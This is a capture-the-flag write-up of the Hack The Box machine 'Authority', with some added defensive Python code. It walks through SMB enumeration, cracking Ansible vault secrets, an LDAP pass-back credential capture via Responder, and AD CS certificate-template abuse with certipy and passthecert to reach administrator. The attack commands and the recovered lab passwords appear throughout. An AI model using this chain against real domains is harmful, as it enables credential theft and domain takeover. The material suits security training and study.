Authority -[ADCS attack, LDAP Passback attack, Ansible]
Start by adding the FQDN to your hosts file:
echo "- authority.htb" | sudo tee -a /etc/hosts
Reconnaissance with Nmap
nmap -sCV -T4 -p- -

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time:-:26:29Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN:-, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: -T23:03:21
|_Not valid after:  -T23:13:21
|_ssl-date: -T02:28:01+00:00; +4h00m00s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN:-, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: -T23:03:21
|_Not valid after:  -T23:13:21
|_ssl-date: -T02:27:57+00:00; +3h59m59s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN:-, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: -T23:03:21
|_Not valid after:  -T23:13:21
|_ssl-date: -T02:27:58+00:00; +3h59m59s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN:-, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: -T23:03:21
|_Not valid after:  -T23:13:21
|_ssl-date: -T02:27:58+00:00; +4h00m00s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
8443/tcp  open  ssl/https-alt
|_http-title: Site doesn't have a title (text/plain;charset=UTF-8).
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 200
|     Content-Type: text/html;charset=ISO-8859-1
|     Content-Length: 82
|     Date: Tue, 15 Aug 2023 02:26:37 GMT
|     Connection: close
|   GetRequest:
|     HTTP/1.1 200
|     Content-Type: text/html;charset=ISO-8859-1
|     Content-Length: 82
|     Date: Tue, 15 Aug 2023 02:26:35 GMT
|     Connection: close
|   HTTPOptions:
|     HTTP/1.1 200
|     Allow: GET, HEAD, POST, OPTIONS
|     Content-Length: 0
|     Date: Tue, 15 Aug 2023 02:26:36 GMT
|     Connection: close
|   RTSPRequest:
|     HTTP/1.1 400
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 1936
|     Date: Tue, 15 Aug 2023 02:26:44 GMT
|     Connection: close
|_    HTTP Status 400 Request / Type Exception Report / Message Invalid character found in the HTTP protocol [RTSP/1.00x0d0x0a0x0d0x0a...] / Description The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=-
| Not valid before: -T00:01:15
|_Not valid after:  -T11:39:39
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49688/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49689/tcp open  msrpc         Microsoft Windows RPC
49691/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
49704/tcp open  msrpc         Microsoft Windows RPC
49706/tcp open  msrpc         Microsoft Windows RPC
49715/tcp open  msrpc         Microsoft Windows RPC
56095/tcp open  msrpc         Microsoft Windows RPC

Host script results:
| smb2-time:
|   date: -T02:27:42
|_  start_date: N/A
|_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m58s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 14 23:28:01 2023 -- 1 IP address (1 host up) scanned in 101.97 seconds
Service Enumeration
SMB [139/445]
I like to start out most Windows boxes by checking the SMB server for shares we have anonymous access to.
Using smbclient:

⚡otsutsukisec: smbclient -L //-/
Password for [WORKGROUP\krill]:

        Sharename          Type      Comment
        ---------          ----      -------
        ADMIN$             Disk      Remote Admin
        C$                 Disk      Default share
        Department Shares  Disk
        Development        Disk
        IPC$               IPC       Remote IPC
        NETLOGON           Disk      Logon server share
        SYSVOL             Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to - failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
I can connect to the Department Shares share, but I don't have enough permissions to list the content of this directory.

⚡otsutsukisec: smbclient //-/'Department Shares'
Password for [WORKGROUP\krill]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \>
Connecting to the other non-default share, Development, was successful, and I can also list the content of this directory.

⚡otsutsukisec: smbclient //-/Development
Password for [WORKGROUP\krill]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Mar 17 14:20:38 2023
  ..                                  D        0  Fri Mar 17 14:20:38 2023
  Automation                          D        0  Fri Mar 17 14:20:40 2023

                - blocks of size -. - blocks available
To access this share more easily, I mounted it on my attack machine:

> mkdir /tmp/mount
> sudo mount //-/Development /tmp/mount/
> cd /tmp/mount
Inside this share there is a directory called Automation, which in turn contains a directory called Ansible. Listing the content of Ansible, I got the following files.
Looking into the ADCS directory, I immediately know this is an Ansible collection because of the file structure and the .yml files. Also read the requirements.yml file.
Basically, Ansible is an automation platform used to configure systems, deploy software, provision cloud resources and do nearly anything else a systems administrator does on a weekly or daily basis. :)
It is possible to find hard-coded credentials in the configuration files of this Ansible collection.
I found the passphrase for the Certificate Authority key, but currently I don't have any use for it, so I'll keep it for later.
Now moving on to the next directory, LDAP; this is also another Ansible collection.
Moving on to the PWM directory. Wait a minute 🤔, the nmap result shows there is a service running on port 8443, and that service also displays the text /pwm. This is also another Ansible collection.
Reading the content of the ansible.cfg file reveals a username, svc_pwm.
Found WinRM credentials in the ansible_inventory file; I tried to log in using WinRM, but they weren't valid credentials :(
Looking into the defaults/ directory, I found Ansible Vault tokens in the main.yml file.
I can use John the Ripper to crack the vault password; I need to strip the spaces from the hash and also convert it to a format that john understands.
cat hash | tr -d " " > hash.ansible
ansible2john hash.ansible > hash1
Now I can crack the hash:
john --wordlist=/opt/rockyou.txt hash1
This gives the clear-text password !@#$%^&*
Using the password obtained, we can easily decrypt the other tokens, so we have the following values:

pwm_admin_login: svc_pwm
pwm_admin_password: pWm_@dm!N_!23
ldap_admin_password: DevT3st@123
HTTP [8443]
The website on this port is a password manager application (PWM).
Trying to authenticate using the credentials I got from the vault, I got an error.
It seems the application is having issues binding to the LDAP server that was specified in its configuration file.
Clicking on Configuration Manager and providing the password pWm_@dm!N_!23 authenticated successfully. We can either import or download an existing configuration file.
I downloaded the current configuration file in order to have a template to make changes to before importing it back to the server.
Going through the config file, I noticed a field that contained the LDAP server URL.
We can perform an LDAP Pass-back attack, since we have access to modify the content of the configuration file.
LDAP Pass-back attacks can be performed when we gain access to a device's configuration where the LDAP parameters are specified. In an LDAP Pass-back attack, we change the configured LDAP server address to our own IP and then trigger a test of the LDAP configuration, which forces the device to attempt an LDAP bind against our rogue server. We can intercept this authentication attempt to recover the LDAP credentials.
In order to carry out this attack, we can use Responder:
sudo responder -I tun0
Before importing the configuration file to the server, we need to change the LDAP URL parameter to the IP address of our attack machine.
After you upload the configuration file, the server restarts and, after a couple of seconds, you should get a connection attempt on Responder which reveals the clear-text password of the svc_ldap user.
svc_ldap:lDaP_1n_th3_cle4r!
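What Responder caught above is an LDAP simple bind sent without TLS. As an added example (not code from the write-up or from Responder), here is a minimal BER parser that detects exactly that on a captured packet, so a defender can alert on service accounts binding in the clear; the packet below is constructed, and the password in it is a placeholder.

```python
# Added example: spot LDAP simple BindRequests carrying a cleartext password.
# Sample packet and names are constructed; the DN mirrors the svc_ldap account.

def _enc(tag, value):
    """BER-encode one TLV (short-form length, enough for small test packets)."""
    assert len(value) < 0x80
    return bytes([tag, len(value)]) + value

def _tlv(buf, i):
    """Read one TLV at offset i; return (tag, value, offset after it)."""
    tag, first = buf[i], buf[i + 1]
    if first < 0x80:                          # short-form length
        length, start = first, i + 2
    else:                                     # long-form length
        n = first & 0x7F
        length, start = int.from_bytes(buf[i + 2:i + 2 + n], "big"), i + 2 + n
    return tag, buf[start:start + length], start + length

def parse_simple_bind(packet):
    """Return (name, password) for an LDAP simple BindRequest, else None."""
    tag, msg, _ = _tlv(packet, 0)
    if tag != 0x30:                           # LDAPMessage SEQUENCE
        return None
    _, _msgid, i = _tlv(msg, 0)               # messageID INTEGER
    op_tag, op, _ = _tlv(msg, i)
    if op_tag != 0x60:                        # [APPLICATION 0] BindRequest
        return None
    _, _version, j = _tlv(op, 0)              # version INTEGER
    _, name, j = _tlv(op, j)                  # name LDAPDN
    auth_tag, auth, _ = _tlv(op, j)
    if auth_tag != 0x80:                      # [0] simple; 0xA3 would be SASL
        return None
    return name.decode(), auth.decode()

def flags_cleartext_bind(packet, dst_port):
    """True when a non-empty simple bind travels over a non-TLS LDAP port."""
    parsed = parse_simple_bind(packet)
    return bool(parsed and parsed[1] and dst_port not in (636, 3269))

# Constructed sample: what a PWM-style client sends when its LDAP URL points at
# ldap://<host>:389 and it binds with a service account (placeholder password).
SAMPLE_BIND = _enc(0x30,
    _enc(0x02, b"\x01") +                     # messageID = 1
    _enc(0x60,
        _enc(0x02, b"\x03") +                 # version = 3
        _enc(0x04, b"CN=svc_ldap,CN=Users,DC=authority,DC=htb") +
        _enc(0x80, b"example-password")))     # simple auth, cleartext

if __name__ == "__main__":
    print(parse_simple_bind(SAMPLE_BIND), flags_cleartext_bind(SAMPLE_BIND, 389))
```

The same bind over 636 (LDAPS) or after StartTLS never reaches a passive listener in this form, which is the fix the leaked credential points to.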
Initial-Foothold
I created a word-list using the discovered credentials, then used crackmapexec to brute-force WinRM access.
Using the LDAP credentials obtained, we can gain WinRM access using evil-winrm.
Post Exploitation
Remember the Ansible collection ADCS that was found in the Development SMB share: there is a high possibility that Active Directory Certificate Services (AD CS) is installed on this server. We can use a tool called Certipy to enumerate vulnerable certificate templates.
Certipy is an offensive tool for enumerating and abusing Active Directory Certificate Services (AD CS). If you're not familiar with AD CS and the various domain escalation techniques.
First, we need to check if any certificate template is vulnerable:
> certipy find -vulnerable -stdout -u - -p 'lDaP_1n_th3_cle4r!' -dc-ip -
Found a certificate authority, AUTHORITY-CA, so there's definitely AD CS installed on this server.
Also found a certificate template: CorpVPN.
Certipy flags a vulnerability at the bottom:
AUTHORITY.HTB\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
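The Certipy finding is the conjunction of several template attributes. As an added example (not from the write-up or from Certipy), the audit below evaluates those attributes for a template and names which conditions hold; the two templates are constructed, one mirroring the CorpVPN finding and one a hardened copy, and the attribute names are the real LDAP ones while the enrollment_rights list is a simplified stand-in for the template's security descriptor.

```python
# Added example: audit certificate-template attributes for the ESC1 conditions.
# Templates are constructed; real values come from the AD configuration partition.

CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1      # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x2              # bit in msPKI-Enrollment-Flag (manager approval)
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}

def esc1_check(template):
    """Return (vulnerable, reasons). All five conditions must hold for ESC1;
    the reasons list names those that do, so a partial match is still useful."""
    eku = set(template["pKIExtendedKeyUsage"])
    low_priv = LOW_PRIV_PRINCIPALS & set(template["enrollment_rights"])
    conditions = [
        (bool(template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
         "enrollee supplies subject"),
        (not eku or bool(eku & CLIENT_AUTH_EKUS),   # empty EKU list means any purpose
         "template allows client authentication"),
        (not template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS,
         "no manager approval required"),
        (template["msPKI-RA-Signature"] == 0, "no authorized signature required"),
        (bool(low_priv), ", ".join(sorted(low_priv)) + " can enroll"),
    ]
    reasons = [text for ok, text in conditions if ok]
    return len(reasons) == len(conditions), reasons

# Constructed: attributes matching the finding quoted above.
CORPVPN_AS_FOUND = {
    "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "msPKI-Enrollment-Flag": 0,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.1"],  # client + server auth
    "enrollment_rights": ["Domain Computers", "Domain Admins"],
}
# Constructed hardened copy: the CA builds the subject from AD (bit cleared) and
# enrollment is limited to an administrative group, so the chain breaks twice.
CORPVPN_HARDENED = dict(CORPVPN_AS_FOUND,
                        **{"msPKI-Certificate-Name-Flag": 0,
                           "enrollment_rights": ["VPN Cert Admins"]})

if __name__ == "__main__":
    for name, tpl in (("CorpVPN", CORPVPN_AS_FOUND), ("CorpVPN-hardened", CORPVPN_HARDENED)):
        print(name, esc1_check(tpl))
```

The "Domain Computers can enroll" reason is what makes the next step (adding a computer account) possible, so a non-zero MachineAccountQuota widens the set of principals this check should treat as low-privileged.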
Next, we need to add a new computer to the domain in order to generate the certificate of an arbitrary user (in this case, the administrator). We can use impacket-addcomputer to achieve this.
> impacket-addcomputer 'authority.htb/svc_ldap:lDaP_1n_th3_cle4r!' -method LDAPS -computer-name 'FIRE-PC' -computer-pass 'fire@123'
That completed successfully; now we can request the administrator's certificate:
> certipy req -u - -p 'fire@123' -target authority.htb -template CorpVPN -ca AUTHORITY-CA -upn
We need to extract the key and certificate from the PFX file using Certipy:
> certipy cert -pfx administrator.pfx -nokey -out user.crt
> certipy cert -pfx administrator.pfx -nocert -out user.key
Finally, using PassTheCert.py we can change the administrator's password and gain elevated access using their account:
> python3 passthecert.py -action modify_user -crt user.crt -key user.key -domain authority.htb -dc-ip - -target administrator -new-pass
Using evil-winrm again, we can gain access to the machine as administrator:
> evil-winrm -i - -u administrator -p 'HfJazLpr6UEbMmCdAJtZQSqQxC8dEKsl'